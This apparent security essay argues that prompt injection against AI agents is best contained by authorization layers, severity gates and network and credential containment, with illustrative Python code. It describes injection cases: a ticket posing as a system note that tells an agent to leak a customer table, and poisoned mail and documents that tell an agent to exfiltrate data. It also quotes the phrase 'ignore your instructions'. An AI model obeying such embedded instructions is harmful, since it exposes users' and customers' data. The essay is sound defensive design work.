Most discussion of prompt injection asks the wrong question. It asks how to catch the malicious instruction hidden in a document, a web page, or a tool result. That is a filtering problem, and filtering problems are lost on a long enough timeline, because there are unlimited ways to phrase "ignore your instructions."
The better question is what happens when the filter fails, when the agent is fully convinced to do the wrong thing. If the answer is that it does the wrong thing, you never had security. If the answer is that it tries, and the action is refused because the agent was never allowed to do it, you do. Prompt injection is an authorization problem.
Why filtering is the wrong frame
The standard defense is a classifier on the input: scan the document, the web page, the tool output for instructions that look like an attack. Do it. It helps. It will also miss. Natural language has unlimited paraphrases, the attacker iterates, and you cannot enumerate what you have not seen.
Picture the concrete case. A support agent reads an incoming ticket to draft a reply. Buried in the ticket text, formatted to look like a system note, is a line telling the agent to look up the customer table and paste it into the response. A good classifier catches the obvious version. The hundredth rephrasing, in a language the classifier was not tuned for, wrapped in a plausible workflow note, eventually gets through. You are now relying on having anticipated an adversary who only has to win once.
Worse, the content the agent has to read to do its job is exactly the content an attacker controls: the support ticket, the web page, the uploaded PDF. A defense that depends on perfectly classifying adversarial natural language is a defense that loses eventually. So we assume the model can be talked into anything, and we put the security somewhere the model's beliefs cannot reach.
Prompts are not the boundary
A prompt is an instruction to the model. It can shape what the agent tries. It cannot change what the agent is allowed to do. Those are two different systems. What the agent is allowed to do is decided by the authorization layer, which sits below the model and evaluates every action before it touches data, a tool, or a setting.
The model proposes; the authorization layer disposes. No sentence in any document can grant the agent a permission it does not have, because permissions are not granted by sentences. They are granted by an administrator, ahead of time, and checked at the moment of every action.
The default underneath all of it is fail-safe. No agent, tool, or cross-workspace path gets access until it is explicitly granted and allowed by policy. Silence means no. A malicious instruction has to overcome a system that starts by denying everything, and instructions cannot grant. Only administrators can.
The permission ceiling
Concretely, every agent runs under a set of grants: which resources it can reach, which tools it can call, at which severities. A poisoned document that says "delete every record in the table" reaches an agent with no delete grant, and the delete is refused at the authorization layer. This is not the model declining out of good judgment, which is unreliable. It is the system declining on the model's behalf, which is not.
The malicious instruction does not fail because the agent saw through it. It fails because the agent was never able to carry it out in the first place. That is the property you want: safety that does not depend on the model being smart enough to refuse.
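A minimal sketch of that ceiling, in Python, may make the property concrete. Everything named here (Grant, AuthorizationLayer, delete_records, the "support-agent" identifier) is hypothetical and chosen for illustration; it is not the API of any particular product. The point it tries to show is that the check runs before the data is touched and never consults what the model read.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Grant:
    """One administrator-issued permission: an action on a resource."""
    resource: str
    action: str


class AuthorizationError(Exception):
    """Raised when an agent attempts an action it holds no grant for."""


class AuthorizationLayer:
    def __init__(self, grants: dict[str, frozenset[Grant]]):
        # Grants are fixed ahead of time by an administrator.
        # Nothing the model reads is an input to this object.
        self._grants = grants

    def check(self, agent_id: str, resource: str, action: str) -> None:
        # Deny by default: an unknown agent holds an empty grant set.
        held = self._grants.get(agent_id, frozenset())
        if Grant(resource, action) not in held:
            raise AuthorizationError(f"{agent_id} may not {action} {resource}")


def delete_records(authz: AuthorizationLayer, agent_id: str, table: list) -> None:
    # The check happens before the data is touched.
    authz.check(agent_id, "customers", "delete")
    table.clear()


# Hypothetical setup: the support agent can read customers and nothing else.
authz = AuthorizationLayer({
    "support-agent": frozenset({Grant("customers", "read")}),
})
table = ["alice", "bob"]

# Assume the model was fully convinced by a poisoned document and proposes a delete.
try:
    delete_records(authz, "support-agent", table)
    outcome = "deleted"
except AuthorizationError:
    outcome = "refused"
```

In this sketch the delete is refused and the table is unchanged, regardless of how persuasive the injected text was, because the text is never part of the decision.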
Severity gates: a prompt cannot raise the ceiling
Some actions are more dangerous than others, and the system sorts them by severity. Reading accessible content is low. Sending externally, deleting content, and changing permissions are high. A grant says the agent may attempt an action. The user's authorization says how far it may go without asking again. A prompt cannot lift that line.
Picture an agent authorized to read and summarize a mailbox, then instructed by a poisoned message to forward the summary to an outside address. It hits a severity gate. External send is high, it was not authorized at that severity, and the action stops for human approval. The injection cannot escalate on its own, because escalation is a decision a person makes, not a string the model parses.
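The gate described above can be sketched in a few lines of Python. The action names, the two-level Severity enum, and the choice to treat unknown actions as high are assumptions made for this illustration, not a description of a specific implementation. Note what the function does not take as an argument: any text the model has read.

```python
from enum import IntEnum


class Severity(IntEnum):
    LOW = 1
    HIGH = 2


# Hypothetical severity table, following the examples in the text.
ACTION_SEVERITY = {
    "read": Severity.LOW,
    "summarize": Severity.LOW,
    "send_external": Severity.HIGH,
    "delete": Severity.HIGH,
    "change_permissions": Severity.HIGH,
}


def gate(action: str, authorized_up_to: Severity) -> str:
    """Decide whether an action proceeds or stops for a person to approve."""
    # Assumption: an action missing from the table is treated as HIGH (fail-safe).
    severity = ACTION_SEVERITY.get(action, Severity.HIGH)
    if severity <= authorized_up_to:
        return "proceed"
    return "needs_human_approval"


# The mailbox agent is authorized only up to LOW.
summary_decision = gate("summarize", Severity.LOW)
forward_decision = gate("send_external", Severity.LOW)
```

Here the summary proceeds and the external send stops for approval. The only way to change the second result is to change authorized_up_to, and that value comes from a person, not from the prompt.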
One attack, every layer
It helps to follow a single attack all the way down. A poisoned document tells a read-only research agent to export a customer list to an external address. First it meets the permission ceiling: the agent has read and summarize grants and no export tool, so export is not an action it can take at all.
Suppose, for the sake of argument, an admin had granted an export tool. The attack then meets the severity gate: sending externally is high, the user authorized the agent only up to low, and the action stops for approval. Suppose the user had pre-authorized that too. It then meets the network: the sandbox can reach nothing but the proxy, and the proxy has no allowlist entry for the attacker's address. Suppose even that. There is still no standing credential in the sandbox to authenticate the send. The attack has to win four times in a row, against four systems that do not care what the document said.
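The walk-through above can be replayed as a small Python sketch. The Environment fields and the first_blocking_layer function are hypothetical names invented for this example, and each layer is reduced to a single boolean check, which is a large simplification. What it illustrates is the ordering: each "suppose" removes one obstacle, and the next independent check takes over.

```python
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Environment:
    tools: set[str] = field(default_factory=set)             # tools an admin granted
    user_authorized_high: bool = False                       # user pre-approved high severity
    egress_allowlist: set[str] = field(default_factory=set)  # hosts the proxy will reach
    credential_in_sandbox: bool = False                      # stays False in this design


def first_blocking_layer(env: Environment, tool: str, destination: str) -> Optional[str]:
    """Return the name of the first layer that stops the action, or None."""
    checks = [
        ("permission ceiling", tool in env.tools),
        ("severity gate", env.user_authorized_high),  # external send is high severity
        ("network", destination in env.egress_allowlist),
        ("credentials", env.credential_in_sandbox),
    ]
    for name, passed in checks:
        if not passed:
            return name
    return None


# Read-only research agent, poisoned document asks for an export.
env = Environment(tools={"read", "summarize"})
stops = [first_blocking_layer(env, "export", "attacker.example")]

env.tools.add("export")                      # suppose an admin granted export
stops.append(first_blocking_layer(env, "export", "attacker.example"))

env.user_authorized_high = True              # suppose the user pre-authorized it
stops.append(first_blocking_layer(env, "export", "attacker.example"))

env.egress_allowlist.add("attacker.example") # suppose even the allowlist had an entry
stops.append(first_blocking_layer(env, "export", "attacker.example"))
```

None of the four checks reads the document. In this sketch, stops ends up listing the permission ceiling, the severity gate, the network, and the credentials, in that order.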
Containment is the backstop
Even if an agent is fully subverted and tries everything, two infrastructure controls cap the damage. The network is deny-by-default: the only way out is the proxy, so there is nowhere to send stolen data. Credentials live outside the sandbox and are attached per action by that proxy, so there is no secret to steal and no way to act outside the granted surface.
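As a rough illustration of those two controls working together, here is a Python sketch of a proxy that refuses unlisted hosts and attaches a credential only at forwarding time. EgressProxy, EgressDenied, the host names, the token, and the fake transport are all assumptions made for the example. A real proxy would sit at the network layer rather than in application code.

```python
from typing import Callable
from urllib.parse import urlsplit


class EgressDenied(Exception):
    """Raised when a request targets a host with no allowlist entry."""


class EgressProxy:
    def __init__(
        self,
        credentials: dict[str, str],
        transport: Callable[[str, dict[str, str]], int],
    ):
        # Maps each allowed host to a credential held by the proxy,
        # outside the sandbox. A host with no entry is unreachable.
        self._credentials = credentials
        self._transport = transport

    def forward(self, url: str, headers: dict[str, str]) -> int:
        host = urlsplit(url).hostname
        if host not in self._credentials:
            raise EgressDenied(f"no allowlist entry for {host!r}")
        # Attach the credential for this one request only.
        outbound = {**headers, "Authorization": f"Bearer {self._credentials[host]}"}
        # Only the status code goes back to the sandbox, never the credential.
        return self._transport(url, outbound)


# Fake upstream transport that records what the proxy sent.
sent = []


def fake_transport(url: str, headers: dict[str, str]) -> int:
    sent.append((url, headers))
    return 200


proxy = EgressProxy({"api.crm.example": "token-held-by-proxy"}, fake_transport)

status = proxy.forward("https://api.crm.example/v1/notes", {"Content-Type": "application/json"})

try:
    proxy.forward("https://attacker.example/upload", {})
    blocked = False
except EgressDenied:
    blocked = True
```

The sandboxed caller never holds the token: it passes plain headers in and gets a status code back. The request to the unlisted host is refused before anything leaves.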
The permission ceiling, the severity gates, and the infrastructure containment (the network and credential controls together) are three independent layers. An injection has to defeat all three to do anything, when fooling the model was supposed to be the entire attack. Depth like that is what turns a model that can be fooled into a system that holds anyway.
Watch the boundary, do not just trust it
The last layer is observation. Because every action and every tool call passes through the authorization layer and the proxy, unusual patterns are visible: a tool-call sequence that does not fit the task, an egress target no one expected, an agent repeatedly approaching a severity threshold it is not cleared for. None of that is the boundary; the boundary already held. It is how you notice that someone tried, and tighten before they try again.
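One simple form of that observation is counting refusals per agent in the audit trail. The sketch below is in Python; the AuditEvent fields, the decision strings, and the threshold of three are hypothetical choices for illustration, and a real deployment would likely look at richer signals such as tool-call sequences and egress targets.

```python
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class AuditEvent:
    agent_id: str
    action: str
    decision: str  # "allowed", "denied", or "needs_approval"


def flag_agents(events: list[AuditEvent], max_refusals: int = 3) -> list[str]:
    """Return agents whose refused or gated attempts reach the threshold."""
    refusals = Counter(e.agent_id for e in events if e.decision != "allowed")
    return sorted(agent for agent, count in refusals.items() if count >= max_refusals)


# Hypothetical audit trail: one agent keeps hitting the boundary.
events = [
    AuditEvent("mail-agent", "summarize", "allowed"),
    AuditEvent("mail-agent", "send_external", "needs_approval"),
    AuditEvent("mail-agent", "send_external", "needs_approval"),
    AuditEvent("mail-agent", "delete", "denied"),
    AuditEvent("research-agent", "read", "allowed"),
    AuditEvent("research-agent", "export", "denied"),
]

flagged = flag_agents(events)
```

Every event in this trail was already stopped or allowed by the boundary. The flag only tells an operator where to look.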
The frame that scales with autonomy
There is a reason to prefer this frame beyond elegance. As agents get more capable and more autonomous, the set of things they can be talked into attempting only grows, and filtering their inputs only gets harder. The authorization surface does not grow with autonomy. The grants are the same whether the model is today's or something far stronger next year.
Anchoring safety to what the agent is allowed to do, rather than to what it can be talked into doing, is the rare security property that gets relatively stronger as the models improve, instead of weaker. The smarter the thing inside the sandbox, the more you want the boundary to sit below it, where intelligence does not help.
Put the security where the prompt cannot reach
The promise worth making about prompt injection is not that the model will never be fooled. Assume it will be. The promise is that a fooled model cannot do anything it was not already allowed to do. Put the security where the prompt cannot reach it, and the worst a malicious instruction can achieve is to make an agent attempt something and be told no.
That is a promise you can actually keep, because it does not require winning an arms race against language. It requires being strict about access, which is a thing software is good at.